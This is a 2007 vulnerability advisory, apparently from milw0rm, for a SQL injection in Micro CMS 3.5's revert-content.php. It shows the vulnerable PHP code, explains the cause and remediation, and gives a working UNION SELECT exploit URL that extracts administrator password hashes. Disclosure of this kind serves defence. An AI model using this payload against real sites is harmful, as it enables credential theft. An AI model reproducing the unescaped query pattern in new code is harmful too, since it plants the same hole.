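#########################################################################################
#
# not sec group
# http://www.notsec.com  info@notsec.com
#
# [Micro CMS 3.5]
#
# Class:     SQL Injection
# Found:     28/08/2007
# Remote:    Yes
# Site:      http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html
# Download:  http://www.impliedbydesign.com/apps/microcms/microcms.zip
# Demo site: http://www.impliedbydesign.com/micro-cms-content-management-demo.php
# Author:    R00T[ATI] of notsec
# Contact:   r00t.ati@notsec.com - http://www.notsec.com
#
#########################################################################################

Vulnerable code: cms/revert-content.php
============================================================================================================
$sql = '
    SELECT * FROM microcms_content_blurb_history
    WHERE content_blurbs_variable = "' . $_GET['id'] . '"
    ORDER BY content_blurb_history_version_num DESC
    LIMIT 1';
$result = mysql_query($sql);
============================================================================================================

Cause and fix:
============================================================================================================
The "id" request parameter is concatenated, unescaped, into a double-quoted SQL string literal, so a
double quote in the request ends the literal and whatever follows is parsed as SQL. The request below
uses that to pull a column of microcms_administrators into the result through a UNION.
The fix is to bind "id" as a parameter of a prepared statement (mysqli or PDO) rather than building the
query by concatenation; on the legacy mysql_* API the minimum is mysql_real_escape_string() on the value.
On an affected install, treat the contents of administrators_pass as exposed and reset them, and review
web logs for requests to cms/revert-content.php whose "id" carries an encoded double quote (%22) or SQL
keywords.
============================================================================================================

Exploit :
============================================================================================================================================================================================
http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*
============================================================================================================================================================================================

Thanks To:
=========================
All notsec.com members;
White_Sheep for Bugs Hunter;
=========================

# notsec.com

# milw0rm.com [2007-08-28]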